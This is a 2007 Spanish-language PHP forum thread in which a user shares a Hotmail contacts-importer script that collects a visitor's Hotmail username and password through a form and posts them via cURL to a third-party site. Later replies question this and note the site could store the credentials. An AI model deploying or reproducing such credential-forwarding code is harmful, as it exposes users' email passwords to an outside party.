Foros del Web » Programando para Internet » PHP »

Captar contactos de HOTMAIL

Estas en el tema de Captar contactos de HOTMAIL en el foro de PHP en Foros del Web. Hola a todos, como bien pedi permiso en el foro de soporte ... aqui les tengo el codigo para captar los contactos de HOTMAIL, son ...
  #1 (permalink)  
Antiguo 02/01/2007, 20:32
Avatar de lrunge  
Fecha de Ingreso: agosto-2005
Ubicación: En algun lugar de Caracas
Mensajes: 165
Antigüedad: 18 años, 8 meses
Puntos: 4
Captar contactos de HOTMAIL

Hola a todos, como bien pedi permiso en el foro de soporte... aqui les tengo el codigo para captar los contactos de HOTMAIL, son dos archivos

La cuestion es que tengo un script en PHP, el cual muestra los contactos de hotmail de aquel usuario que introduzca su login y pass de hotmail... (Un Hotmail Contacts importer)

Queria probarlo, ya que con varios amigos funciona, pero con 2 personas no funciono...


demoform.php:

Código PHP:
<table>
  <
tr>
    <
td><a href="index.php"><img src="images/logo_hotmail.gif" width="88" height="24" border="0" /></a></td>
  </
tr>
</
table>
<
p>Introduce tu nombre de usuario y contrase&ntilde;a de hotmail </p>
<
form action="index.php" method="post">

<
table width="700">
  <
tr>
    <
td width="62">Usuario</td>
    <
td width="626"><input type="text" name="username" />
      @
hotmail.com</td>
  </
tr>
  <
tr>
    <
td>Password</td>
    <
td><input type="password" name="password" /></td>
  </
tr>
  <
tr>
    <
td>&nbsp;</td>
    <
td>&nbsp;</td>
  </
tr>
  <
tr>
    <
td colspan="2"><input name="submit" type="submit" value="Enviar" /></td>
    </
tr>
</
table>
<
br>
<
br>
</
form
index.php:

Código PHP:
<style type="text/css">
<!--
body,td,th {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
}
-->
</style><?php 
#Copyright Free 
$disclaimer ""

if (
$_POST

$login $_POST['username']; 
$password $_POST['password']; 

#you should call get_contacts like this: 
$resultarray get_contacts($login$password); 

#if contacts were retreived successfully: 
if(is_array($resultarray)) 

#the first array_shift of the result will give you the names in an array 
$names array_shift($resultarray); 
#the second array_shift of the result will give you the emails 
$emails array_shift($resultarray); 

$maxin count($names); 

echo 
'<table border="1">'
$mails_luis "";
for (
$i=0$i<$maxin; ++$i

$mails_luis .= $emails[$i].'; ';

echo  
'<tr><td>'.($i+1).'</td><td>'.$names[$i].'</td><td>'.$emails[$i].'</td></tr>';


echo 
"</table>"


else 

$action "http://" $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . ((isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']!="")? "?$_SERVER[QUERY_STRING]" ""); 
$formname "Hotmail"
include(
"demoform.php"); 



function 
get_contacts($login$password

global 
$formname
global 
$formheading
global 
$disclaimer
global 
$usrtxt

if(!
eregi("@"$login)) 

$login .= "@hotmail.com"


if (
trim($login)=="" || trim($password)==""

$action "http://" $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . ((isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']!="")? "?$_SERVER[QUERY_STRING]" ""); $disclaimer "<br><b style=\"color:red\">Enter Your Username and Password</b><br>"
$formname "Hotmail"
include(
"demoform.php"); 
return 
0


$url $_SERVER['PHP_SELF']; 
$querystr = (isset($_SERVER['QUERY_STRING'])?"?" $_SERVER['QUERY_STRING']:""); 
$url .= $querystr

$ch curl_init(); 
curl_setopt($chCURLOPT_URL,"http://svetlozar.net/nukemodule/hotmaildemo.php"); 
curl_setopt($chCURLOPT_REFERER$_SERVER['HTTP_HOST'] . $url); 
curl_setopt($chCURLOPT_RETURNTRANSFER1); 
curl_setopt($chCURLOPT_FOLLOWLOCATION1); 
curl_setopt($chCURLOPT_POST1); 
curl_setopt($chCURLOPT_POSTFIELDS"email=$login&password=$password"); 

$html curl_exec($ch); 

if(
eregi("###invalid###"$html)) 

$action "http://" $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . ((isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']!="")? "?$_SERVER[QUERY_STRING]" ""); $disclaimer "<br><b style=\"color:red\">Invalid Login</b><br>"
$formname "Hotmail"
include(
"demoform.php"); 
return 
0

else if(
eregi("###warning###"$html)) 

echo 
$html
return 
0


$html explode("\n"$html); 
if (
count($html) == 2

$names explode("#"$html[0]); 
$emails explode("#"$html[1]); 


return array(
$names$emails); 



echo 
$emails[$i].'; ';

?>
Por favor CLUSTER o cualquier Guru del PHP, puedes darme alguna forma de los que visiten el link, puedan ver el codigo de la pagina en la propia pagina, de manera de que no exista ningun tipo de duda, de que los datos que suministren no van a ser almacenados en ningun lado...
__________________
"La sencillez de una respuesta, sera inversamente proporcional a su explicacion" Luis Runge

Última edición por lrunge; 03/01/2007 a las 11:28 Razón: Se elimino el link para probar el SCRIPT, ya que el mismo depende de un servidor externo para ejecutar sus funciones
  #2 (permalink)  
Antiguo 02/01/2007, 20:38
Avatar de lrunge  
Fecha de Ingreso: agosto-2005
Ubicación: En algun lugar de Caracas
Mensajes: 165
Antigüedad: 18 años, 8 meses
Puntos: 4
Re: Captar contactos de HOTMAIL

Igualmente, los que quieran probarlo en sus servidores, haganlo (OJO, creo que en IIS no funciona)

Si hay alguna manera de mejorarlo, me gustaria que me ayudaran, pasense por el foro de soporte y lean mi opinion sobre colocar este tema y el porque primero solicite permiso...

El sistema es para una web que comenzare a mediados de este año, pero no me funciona a un 100%, por eso lo queria someter a sus pruebas y si existe la posibilidad, a sus mejoras...

Saludos...

Agredeciendo la atencion prestada y gracias a CVANDER por permitirme esto...

Atentamente

Luis Runge
__________________
"La sencillez de una respuesta, sera inversamente proporcional a su explicacion" Luis Runge
  #3 (permalink)  
Antiguo 02/01/2007, 21:16
 
Fecha de Ingreso: noviembre-2006
Ubicación: Salinas
Mensajes: 216
Antigüedad: 17 años, 5 meses
Puntos: 0
Re: Captar contactos de HOTMAIL

cuando lo doy toda la info que pide no hace nada. No aparecen los emails q tengo agregado.
  #4 (permalink)  
Antiguo 02/01/2007, 21:43
Avatar de lrunge  
Fecha de Ingreso: agosto-2005
Ubicación: En algun lugar de Caracas
Mensajes: 165
Antigüedad: 18 años, 8 meses
Puntos: 4
Re: Captar contactos de HOTMAIL

Esa es la idea, probarlo y que me digan si les funciona... Como dije antes, lo provamos entre 11 compañeros y a 2 no les funciono...

Lo testeaste en un servidor propio, o en el link que envie?
__________________
"La sencillez de una respuesta, sera inversamente proporcional a su explicacion" Luis Runge
  #5 (permalink)  
Antiguo 03/01/2007, 10:48
Avatar de lrunge  
Fecha de Ingreso: agosto-2005
Ubicación: En algun lugar de Caracas
Mensajes: 165
Antigüedad: 18 años, 8 meses
Puntos: 4
Re: Captar contactos de HOTMAIL

Existe alguien que estudie el codigo, de manera de buscar alguna mejora para que su funcionamiento sea de un 100%???

Hay personas a las cuales que no le funcionan y a otras si..

Salu2
__________________
"La sencillez de una respuesta, sera inversamente proporcional a su explicacion" Luis Runge
  #6 (permalink)  
Antiguo 03/01/2007, 10:55
 
Fecha de Ingreso: julio-2005
Ubicación: Buenos Aires, Argentina
Mensajes: 1.304
Antigüedad: 18 años, 9 meses
Puntos: 6
Re: Captar contactos de HOTMAIL

Una pregunta, esta pagina:

http://svetlozar.net/nukemodule/hotmaildemo.php

Es tuya? Compraste el script?


EDITO: Aclaro el por que de mis pregunta:

Código PHP:
<?php
$ch 
curl_init(); 
curl_setopt($chCURLOPT_URL,"http://svetlozar.net/nukemodule/hotmaildemo.php"); 
curl_setopt($chCURLOPT_REFERER$_SERVER['HTTP_HOST'] . $url); 
curl_setopt($chCURLOPT_RETURNTRANSFER1); 
curl_setopt($chCURLOPT_FOLLOWLOCATION1); 
curl_setopt($chCURLOPT_POST1); 
curl_setopt($chCURLOPT_POSTFIELDS"email=$login&password=$password"); 

$html curl_exec($ch);  
?>
No entiendo nada de como se usa CURL, pero me da la sensacion que en este caso esta pasando el usuario y contraseña ingresada a una web (http://svetlozar.net/nukemodule/hotmaildemo.php)

Y lógicamente, si mis datos van a ir a una web quiero saber de quien es.

Gracias.
__________________
Federico.

Mi página: www.jourmoly.com.ar

Última edición por Fridureiks; 03/01/2007 a las 11:28
  #7 (permalink)  
Antiguo 03/01/2007, 11:47
Avatar de lrunge  
Fecha de Ingreso: agosto-2005
Ubicación: En algun lugar de Caracas
Mensajes: 165
Antigüedad: 18 años, 8 meses
Puntos: 4
Re: Captar contactos de HOTMAIL

Cita:
Iniciado por Fridureiks Ver Mensaje

Y lógicamente, si mis datos van a ir a una web quiero saber de quien es.

Gracias.
Y tienes ABSOLUTAMENTE toda la razon.. acabo de terminar de hablar con unos ingenieros de sistema de la empresa donde trabajo y luego de que analizaran el codigo, me dicen que el script necesita llamar a esa pagina para cumplir su funcion, que lo extraño es que en esa direccion NO HAY NADA, solo hay una pagina de error como si no existiera ahi ningun archivo.

Uno de los ingenieros, me dice que no hay posibilidad de que en esa pagina sean guardados los datos (Eso es lo que el dice), por si acaso, elimine el link hacia mi pagina, para aquellos que lo quieran probar lo hagan pero en sus propios servidores

Cuando investigo de donde es esa pagina, es de Una empresa dedicada a realizar y vender este tipo de script, de donde justamente lo bajehttp://svetlozar.net
__________________
"La sencillez de una respuesta, sera inversamente proporcional a su explicacion" Luis Runge
  #8 (permalink)  
Antiguo 03/01/2007, 11:51
 
Fecha de Ingreso: julio-2005
Ubicación: Buenos Aires, Argentina
Mensajes: 1.304
Antigüedad: 18 años, 9 meses
Puntos: 6
Re: Captar contactos de HOTMAIL

No hay nada en esa pagina porque justamente no debe mostrar datos... sino mas bien procesarlos. Seguramente esa es la pagina que realiza la "peticion de contactos a hotmail", y tranquilamente tambien podria guardar los datos en alguna BD... lo cual hace que al menos yo, no lo quiera probar jeje.

Saludos.
__________________
Federico.

Mi página: www.jourmoly.com.ar
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado

SíEste tema le ha gustado a 7 personas (incluyéndote)




La zona horaria es GMT -6. Ahora son las 03:18.